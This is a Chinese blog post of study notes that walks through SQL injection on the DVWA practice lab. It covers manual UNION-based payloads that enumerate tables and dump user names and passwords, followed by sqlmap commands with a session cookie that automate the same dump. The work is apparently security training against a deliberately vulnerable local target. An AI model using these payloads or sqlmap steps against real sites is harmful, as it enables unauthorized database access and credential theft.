学习笔记(sql注入)

最新推荐文章于 2024-05-16 15:44:40 发布
最新推荐文章于 2024-05-16 15:44:40 发布
阅读量128 收藏
点赞数
文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51301115/article/details/115770290
版权

一、sql injection(low)
(1)手动
输入1查询成功
输入1’ or ‘1’ = '1 查询到多个数据,于是判断存在字符型注入
在这里插入图片描述

输入1’ or 1 = 1 order by 1 # 查询成功
输入1’ or 1 = 1 order by 2 #查询成功
在这里插入图片描述

输入1’ or 1 = 1 order by 3 #返回错误,说明字段为2(通过百度搜索得知:也可以通过输入1’ union select 1,2 #来猜解字段数)
在这里插入图片描述

输入1’ union select 1, database() #,查询数据库名称为dvwa
在这里插入图片描述

输入1’ union select 1,table_name from information_schema.tables where table_schema = ‘dvwa’# 爆表名
得到存在两个表,users 和 gustbook
在这里插入图片描述

输入1’ union select 1,column_name from information_schema.columns where table_name=‘users’ # 爆users 的列
在这里插入图片描述

得到了很多的列,但是看到十分明显的USER和password两列,于是爆它们的字段。
在这里插入图片描述

输入1’ union select 1,concat(USER,password) from users#得到字段
再故技重施,爆得gustbook的列与name的字段
在这里插入图片描述

此次手动sql注入基本完成。
(2)sqlmap
sqlmap -u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=1ijc7cmjqi…s0mpp6” --batch
在这里插入图片描述

发现系统存在注入点
sqlmap -u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=1ijc7cmjqi…s0mpp6” --batch --dbs
得到数据库
在这里插入图片描述

sqlmap -u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=1ijc7cmjqi5smo419qhis0mpp6” -D dvwa --tabelse
查询dvwa中的表
在这里插入图片描述

sqlmap -u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=1ijc7cmjqi5…mpp6” -D dvwa -T users --column
查询users的字段
在这里插入图片描述

sqlmap -u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=1ijc7cmjqi5smo419qhis0mpp6” -D dvwa -T users -C “users,password”
查询users 和 password 字段内容
等待系统自动解密后得到所有内容
在这里插入图片描述

sqlmap注入成功。

哈哈哈我头呢
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入详解
m0_67392811的博客
06-12 5811
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
sql注入学习笔记(一)
w17691058648x的博客
03-11 735
SQL注入:将sql语句注入进web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 具体来说就是讲sql语句注入进后台数据库中,从而达到盗取数据库数据的目的。 URL:同一资源定位符 http:// 192.168.246.130/sqli-labs-master/Less-1/ 协议 IP地址或域名...
SQL注入(Injection)简介
cnds123的专栏
11-25 6428
SQL注入(Injection)简介 SQL注入SQL injection),是发生于应用程序与数据库层的安全漏洞。只要是支持处理SQL指令的数据库服务器,都有可能受到此种手法的攻击。 是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。 SQL注入演示 SQL命令
DVWA之SQL注入
热门推荐
qq_58091216的博客
05-01 2万+
前面没有介绍什么是DVWA,在写SQL注入之前介绍一下什么是DVWA. 一.DVWA介绍 1.1 DVWA简介 DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如sql注入,XSS,密码破解等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 1.2 DVWA模块 DVWA共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行...
DVWA通过攻略之SQL注入_dvwa sql注入
最新发布
2401_84968101的博客
05-16 619
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
DVWA通过攻略之SQL注入
勿山几已
05-24 8492
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
什么是SQL注入SQL Injection)?如何预防它
u013749113的博客
10-01 743
SQL注入攻击是一种严重的网络安全威胁,但通过采取适当的预防措施,可以降低发生攻击的风险。使用参数化查询、输入验证和过滤、最小权限原则、ORM框架以及定期更新和监控等最佳实践,可以帮助保护您的应用程序免受SQL注入攻击的威胁。务必在开发和维护应用程序时考虑安全性,以确保敏感数据的保护和应用程序的稳定性。
SQL学习笔记(完整)
b517146180的博客
07-04 2003
入门MySql
SQL注入笔记
02-07
SQL注入笔记 对于新手学习SQL注入很有帮助 欢迎大家查看
SQL注入手工笔记.txt
11-29
SQL手工注入小结笔记,大家都来学习学习
sql注入笔记
03-15
SQL 注入笔记 SQL 注入是一种常见的 Web 应用程序漏洞,攻击者可以通过inject恶意 SQL 代码来访问、修改或控制数据库中的数据。本文将详细介绍 SQL 注入的基本概念、检测方法和防御策略。 什么是 SQL 注入SQL ...
PHPSQL注入漏洞学习
01-21
SQL注入是攻击者通过输入恶意的SQL代码,欺骗数据库服务器执行非预期的操作,从而获取、修改、删除或添加数据的一种方法。在PHP环境中,由于不安全的用户输入处理,这种漏洞尤为突出。 二、PHP SQL注入的类型 1. ...
JDBC个人学习笔记
12-14
【JDBC学习笔记】 JDBC,全称Java Database Connectivity,是Java编程语言中用来规范客户端程序如何访问数据库的应用程序接口,由Sun Microsystems公司提出。它为程序员提供了标准的API,使得开发者可以使用Java...
白话sql注入sql Injection)系统总结
weixin_54603520的博客
03-23 948
数据库就是一个存储数据的仓库,数据库是以一定方式存储在一起,能与多个用户共享,具有尽可能小的冗余,与应用程序彼此独立的数据集合。mysql中存在4个控制权限的表,分别为user表,db表,tables_priv表,columns_priv表,mysql权限表的验证过程为:先从user表中的Host,User,Password这3个字段中判断连接的ip、用户名、密码是否存在,存在则通过验证。通过身份认证后,进行权限分配,
DVWA靶场之SQL注入通关详解
qq_62169455的博客
06-27 3269
获得字段中的数据,使用查询语句:1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #。获取表中的字段名,当输入查询语句(1 union select 1,column_name from information_schema.columns where table_name='users')后,会发现报错了,原因是语句中含有单引号。
dvwa之SQL盲注
ANDTM的博客
05-30 971
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。SQL盲注和SQL注入的区别就是盲注它不会有完整的回显,这里分为两种,一种是布尔盲注,另一种是时间盲注。
DVWA之sql注入——联合注入和报错注入
Williamanddog的博客
12-20 1855
构造payload:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#使用格式:updatexml(xml_document,xpath_string,new_value),作用是将document的中符合string 的字符串替换为value的值。
DVWA平台搭建+SQL注入实验详解
二狗的博客
04-04 5941
实现DVWA平台的搭建,为后续的SQL注入提供练习环境;进行SQL注入的练习,目的是了解因web应用程序对用户输入数据的合法性没有判断或过滤不严,而造成的危害,以便后续更好地掌握对其的防御手段,提高网络安全意识;
sqli-labs靶场练习笔记
11-09
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值